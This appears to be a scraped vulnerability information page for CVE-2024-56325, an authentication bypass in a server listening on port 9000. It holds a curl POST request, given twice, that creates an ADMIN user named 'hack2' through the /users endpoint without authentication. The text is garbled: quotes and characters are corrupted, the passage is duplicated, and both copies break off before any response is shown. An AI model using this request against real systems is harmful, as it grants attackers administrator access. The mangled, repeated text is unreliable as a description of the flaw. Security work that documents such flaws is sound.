CVE-2024-56325 Information

Description

Authentication Bypass Issue

If the path does not contain / and contain. authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H \Content-Type: application/json\ -d \�sername\:\hack2\\password\:\hack\\component\:\CONTROLLER\\role\:\ADMIN\\tables\:[]\permissions\:[]\�sernameWithComponent\:\hack_CONTROLLER\ http://server_ip:9000/users

Return: ## Reference http://www.openwall.com/lists/oss-security/2025/03/27/8 https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v Authentication Bypass Issue

If the path does not contain / and contain. authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H \Content-Type: application/json
-d {\�sername\:\hack2\\password\:\hack\\component\:\CONTROLLER\\role\:\ADMIN\\tables\:[]\permissions\:[]\�sernameWithComponent\:\hack_CONTROLLER\}

http://{server_ip}:9000/users

Return: {